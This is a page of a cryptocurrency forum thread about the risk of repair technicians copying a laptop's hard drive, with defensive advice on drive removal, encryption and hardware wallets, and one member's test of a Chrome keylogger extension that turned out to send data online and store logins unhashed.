Pages:
Author

Topic: Recovering deleted wallet/files from HDD - page 2. (Read 715 times)

legendary
Activity: 3290
Merit: 16489
Thick-Skinned Gang Leader and Golden Feather 2021
November 07, 2021, 05:22:34 AM
#54
I am not sure many laptop allows for an easy HDD removal, even more  without breaking warrant (Mac User anyone?).
Suggestion: add it to your opsec-checklist to only buy laptops that allows to easily take out the drive.
legendary
Activity: 2380
Merit: 17063
Fully fledged Merit Cycler - Golden Feather 22-23
November 07, 2021, 05:02:19 AM
#53

Just like @LoyceV said, remove the HDD before giving the device to someone else. If they ask why the HDD is missing, you could say you need the data for urgent work and ask them to use their own HDD/USB drive for testing.

I am not sure many laptop allows for an easy HDD removal, even more  without breaking warrant (Mac User anyone?).
Also,even if I haven’t any wallet in it, just having access to my email a malicious user could do extremely dangerous actions.
Basically, when to give your laptop to an external technician, you are trusting him not to rip you off.
Maybe it’s worth asking him to assist in person to your repair, so that you don’t leave him with your datas alone. This could be counterproductive for opsec reasons anyway.
hero member
Activity: 2800
Merit: 595
https://www.betcoin.ag
November 07, 2021, 03:37:51 AM
#52

Giving the laptop with its drive will likely give that computer guy access to old passwords saved on browsers.

I would probably just follow what LoyceV suggested that you take out the HD and then sell it to that computer guy, that's the best and easiest way to do it unless you want the risky option. There could be more files you have there in the hard drive which you can slave later on another computer and scan it all like pictures, txt files, and downloaded files.
jr. member
Activity: 107
Merit: 7
November 07, 2021, 03:22:06 AM
#51
If you ever send it to "anybody" then assume it's been compromised. As to how to handle it, the answer is still the same. Use a hardware wallet. That way, even if all its content is stolen and you get it back with keyloggers and trojans, they still can't access your assets.
At the very least, transfer everything off the machine before sending it off and don't use it for local wallets again until you wipe it off.
full member
Activity: 1792
Merit: 186
November 06, 2021, 04:57:02 PM
#50
So how do you guys handle when there is an issue and you need to bring it your laptop to a repair shop or return it to the company?  Assuming you can just check your hard drive which is to see what is the problem, isn't this already a big issue?  Like imagine it just shows ledger live or electrum as an icon on you computer when they turn it on.


I mean wouldn't they most likely inspect it?
legendary
Activity: 3290
Merit: 16489
Thick-Skinned Gang Leader and Golden Feather 2021
November 06, 2021, 07:48:26 AM
#49
what if something break on your laptop where you have critical informations?
I was serious when I wrote this:
Or use a screwdriver, as that's all it takes to take out the drive.

What if your power supply breaks on your laptop?
I'd probably fix it myself Smiley

Quote
Can you trust your repair shop will not duplicate your hdd?
You can assume this, but you can only be sure if you don't let your HDD out of sight.

Quote
When I gave my phone to repair shop, I resettled it to factory setting, but had the luxury of being able to prepare for the event.
What should you do in case of an “ unforeseeable” event?
Phones are much worse: you can't just take out the disk to send it in for repairs. But phones are also much more likely to get stolen, so I'd say don't store more data on it than you're willing to lose.
hero member
Activity: 1778
Merit: 907
November 06, 2021, 07:00:03 AM
#48

The point is the professional ones can do 30+GB a minute if the drives can keep up so yes, you can pull and clone and replace a filled 1TB drive in about an hour.

-Dave



Interesting question then is: what if something break on your laptop where you have critical informations? What if your power supply breaks on your laptop? Can you trust your repair shop will not duplicate your hdd?

Any ways of mitigating this? Even if the wallet.dats are encrypted, I bet there will still be loads of passwords saved while browsing, that can do a lot of damage.

When I gave my phone to repair shop, I resettled it to factory setting, but had the luxury of being able to prepare for the event.
What should you do in case of an “ unforeseeable” event?

I used to have a desktop computer but the motherboard died on me and never bothered to repair it. Supposing you have a desktop PC, it's not that hard to mount a HDD and recover your data. If I had one myself, I wouldn't have bothered taking it to a technician, since the laptop itself is pretty cheap.
legendary
Activity: 2380
Merit: 17063
Fully fledged Merit Cycler - Golden Feather 22-23
November 06, 2021, 06:37:07 AM
#47

The point is the professional ones can do 30+GB a minute if the drives can keep up so yes, you can pull and clone and replace a filled 1TB drive in about an hour.

-Dave



Interesting question then is: what if something break on your laptop where you have critical informations? What if your power supply breaks on your laptop? Can you trust your repair shop will not duplicate your hdd?

Any ways of mitigating this? Even if the wallet.dats are encrypted, I bet there will still be loads of passwords saved while browsing, that can do a lot of damage.

When I gave my phone to repair shop, I resettled it to factory setting, but had the luxury of being able to prepare for the event.
What should you do in case of an “ unforeseeable” event?
legendary
Activity: 3500
Merit: 6320
Crypto Swap Exchange
November 05, 2021, 06:48:23 AM
#46


Or buy a hardware cloner, clone the drives and read them later.
Put client disk in slot 1 blank disk in slot 2 & push a button. Drink beer. Then put disk back in client PC.
-Dave

those little sata 2 port "docking stations" are not so good as what you might think. if there's one constant about them it is people complaining how it f***ed up their hard drives and made them "raw". doesn't matter the brand.

Looking at my work notes we have done over 170 Spinning drives to SSD since Jan 1 2020 for a client who was extending the life of some older machines so either you and the people you are talking to are using cheap cloners or we have some amazing luck.

I don't know how the $80 generic ones work, but the 'real' ones are just running an embedded linux controller and dd 'ing (more or less) the entire drive.
The source is only ever mounted in read only so having it come back as 'raw' is just about impossible.

This: https://www.amazon.com/SATA-Hard-Drive-Duplicator-Eraser/dp/B00G6TG5YE
is not the same as this: https://www.mediaduplicationsystems.com/fx2125-sata-sas-usb3.0-hard-drive-duplicator

If you walk into a shop or your tech is using something like the StarTech one. Run away as fast as you can.

The point is the professional ones can do 30+GB a minute if the drives can keep up so yes, you can pull and clone and replace a filled 1TB drive in about an hour.

-Dave

legendary
Activity: 2380
Merit: 17063
Fully fledged Merit Cycler - Golden Feather 22-23
November 05, 2021, 04:36:32 AM
#45
Next time I have a problem I will destroy my laptop with an hammer. I am not going to leave my HHDD unattended anymore!
Or use a screwdriver, as that's all it takes to take out the drive.
Or use full disk encryption.
Or an industrial shredder. I prefer a more subtle approach to my hardware.
Seriously though: there's no point to destroy any hardware that doesn't hold data.

Apparently your AI is not sophisticated enough to detect the rhetorical construction known as “Metonym”.
Or actually your AI is so advanced that pretends to misunderstand something in order to appear more human.

Or it’s just me, who think a joke is fun, while it is not.
legendary
Activity: 3290
Merit: 16489
Thick-Skinned Gang Leader and Golden Feather 2021
November 05, 2021, 04:10:49 AM
#44
Next time I have a problem I will destroy my laptop with an hammer. I am not going to leave my HHDD unattended anymore!
Or use a screwdriver, as that's all it takes to take out the drive.
Or use full disk encryption.
Or an industrial shredder. I prefer a more subtle approach to my hardware.
Seriously though: there's no point to destroy any hardware that doesn't hold data.
jr. member
Activity: 107
Merit: 7
November 05, 2021, 03:17:29 AM
#43
Dang.
Now you scared me.
Next time I have a problem I will destroy my laptop with an hammer. I am not going to leave my HHDD unattended anymore!

Exactly. Anything glitches, you nuke the entire thing out. Would be bad though if you later discover it was just an OS bug a day later...
sr. member
Activity: 1190
Merit: 469
November 04, 2021, 10:44:17 PM
#42


Or buy a hardware cloner, clone the drives and read them later.
Put client disk in slot 1 blank disk in slot 2 & push a button. Drink beer. Then put disk back in client PC.
-Dave

those little sata 2 port "docking stations" are not so good as what you might think. if there's one constant about them it is people complaining how it f***ed up their hard drives and made them "raw". doesn't matter the brand.

legendary
Activity: 2380
Merit: 17063
Fully fledged Merit Cycler - Golden Feather 22-23
November 04, 2021, 07:17:27 PM
#41
I see that he hasn't snooped into Chrome at least, can never be too sure about the rest of the hard drive.
If I would want to read someone's files without them knowing about it, I would create an image of the entire drive. This can easily be done by booting a Linux LIVE OS, or by temporarily plugging the drive into another computer. You wouldn't see any of this on your file system.

Or buy a hardware cloner, clone the drives and read them later.
Put client disk in slot 1 blank disk in slot 2 & push a button. Drink beer. Then put disk back in client PC.
PCs / phones / tablets. We live our life on them now, and even the paranoid people can't remember everything that they may have accidentally stored on one.

-Dave

Dang.
Now you scared me.
Next time I have a problem I will destroy my laptop with an hammer. I am not going to leave my HHDD unattended anymore!
legendary
Activity: 3500
Merit: 6320
Crypto Swap Exchange
November 04, 2021, 04:20:32 PM
#40
I see that he hasn't snooped into Chrome at least, can never be too sure about the rest of the hard drive.
If I would want to read someone's files without them knowing about it, I would create an image of the entire drive. This can easily be done by booting a Linux LIVE OS, or by temporarily plugging the drive into another computer. You wouldn't see any of this on your file system.

Or buy a hardware cloner, clone the drives and read them later.
Put client disk in slot 1 blank disk in slot 2 & push a button. Drink beer. Then put disk back in client PC.
PCs / phones / tablets. We live our life on them now, and even the paranoid people can't remember everything that they may have accidentally stored on one.

-Dave
newbie
Activity: 18
Merit: 1
November 04, 2021, 07:28:33 AM
#39
I see that he hasn't snooped into Chrome at least

It would be trivial to mount a drive without touching the files on it (such as Chrome history). Any Linux live USB offers read-only mount support.

Yeah, I'll move everything to new wallets just in case, you can never be safe enough. On top of that, if we suppose that he has snooped through my files, he could potentially try to compromise the wallets at a much later date. That way, no accusation can actually be directed to him.

Absolutely. If I were you, I would definitely pay the transaction fee to move the coins to a new wallet.
legendary
Activity: 2870
Merit: 7490
Crypto Swap Exchange
November 04, 2021, 05:54:00 AM
#38
On the other hand, do you know any kind of similar software that is safe to use?

There are open source version of such software, but i wouldn't recommend it unless you bother audit/test it properly. Besides there's saying "Prevention is better than cure". If you haven't done any action, you could start from enabling 2FA on your online account and using stronger password.

or encrypt your computer files when you leave for a long period of time.

It's not practical if you also want to secure your cryptocurrency wallet or browser data, where the file could be scattered on different folder. You could use full disk encryption (such as BitLocker for Windows and LUKS for Linux), but usually you need to enter password/PIN every time you turn on your laptop and recovery process is harder (if the disk is corrupted).
member
Activity: 189
Merit: 52
In a world of coins, use them.
November 03, 2021, 04:24:50 PM
#37
~snip

From what it claims, it doesn't send any data, and it's stored locally, however, I don't see a reason to keep it anymore, nevertheless, it does look like a safety concern.


What is the name of the extension? I would like to dump the source code of of it to see if it sends data anywhere.
The name of the extension is Fea Keylogger, it mentions that it stores all data locally, or at least I hope it does. It'd be interesting to check if it's actually true or not, make sure to report back when you're done testing.

Link: https://chrome.google.com/webstore/detail/fea-keylogger/fgkghpghjcbfcflhoklkcincndlpobja?hl=en

I installed the extension on a Virtual Machine, found a few issues right off the bat.

The extension communicates with the internet, something that "Only saves data locally" shouldn't connect to the internet. They're is also another issue with the extension, it logs specifically logins, not just web pages visited and such. After further analysis, the data that it saves isn't even hashed, meaning that all of your logins are compromised if someone gets the data from your local storage of the extension.

My advice would be to uninstall the extension, reinstall chrome, then change all of your passwords.
Interesting, I remember looking it up to find anything suspicious but couldn't, anyway, good detective work. It logs any kind of text input, it often saved my posts here. Anyway, I've now uninstalled it, since I do not need it anymore and due to the suspicion of it being a security hazard.

On the other hand, do you know any kind of similar software that is safe to use?

I couldn't really recommend any monitoring software for your own machine, but I think you'll be safe enough by pressing WIN + L when you get up to lock your screen, or encrypt your computer files when you leave for a long period of time.
hero member
Activity: 1778
Merit: 907
November 03, 2021, 03:17:21 PM
#36
~snip

From what it claims, it doesn't send any data, and it's stored locally, however, I don't see a reason to keep it anymore, nevertheless, it does look like a safety concern.


What is the name of the extension? I would like to dump the source code of of it to see if it sends data anywhere.
The name of the extension is Fea Keylogger, it mentions that it stores all data locally, or at least I hope it does. It'd be interesting to check if it's actually true or not, make sure to report back when you're done testing.

Link: https://chrome.google.com/webstore/detail/fea-keylogger/fgkghpghjcbfcflhoklkcincndlpobja?hl=en

I installed the extension on a Virtual Machine, found a few issues right off the bat.

The extension communicates with the internet, something that "Only saves data locally" shouldn't connect to the internet. They're is also another issue with the extension, it logs specifically logins, not just web pages visited and such. After further analysis, the data that it saves isn't even hashed, meaning that all of your logins are compromised if someone gets the data from your local storage of the extension.

My advice would be to uninstall the extension, reinstall chrome, then change all of your passwords.
Interesting, I remember looking it up to find anything suspicious but couldn't, anyway, good detective work. It logs any kind of text input, it often saved my posts here. Anyway, I've now uninstalled it, since I do not need it anymore and due to the suspicion of it being a security hazard.

On the other hand, do you know any kind of similar software that is safe to use?
member
Activity: 189
Merit: 52
In a world of coins, use them.
November 03, 2021, 03:09:32 PM
#35
~snip

From what it claims, it doesn't send any data, and it's stored locally, however, I don't see a reason to keep it anymore, nevertheless, it does look like a safety concern.


What is the name of the extension? I would like to dump the source code of of it to see if it sends data anywhere.
The name of the extension is Fea Keylogger, it mentions that it stores all data locally, or at least I hope it does. It'd be interesting to check if it's actually true or not, make sure to report back when you're done testing.

Link: https://chrome.google.com/webstore/detail/fea-keylogger/fgkghpghjcbfcflhoklkcincndlpobja?hl=en

I installed the extension on a Virtual Machine, found a few issues right off the bat.

The extension communicates with the internet, something that "Only saves data locally" shouldn't connect to the internet. They're is also another issue with the extension, it logs specifically logins, not just web pages visited and such. After further analysis, the data that it saves isn't even hashed, meaning that all of your logins are compromised if someone gets the data from your local storage of the extension.

My advice would be to uninstall the extension, reinstall chrome, then change all of your passwords.
Pages:
Jump to: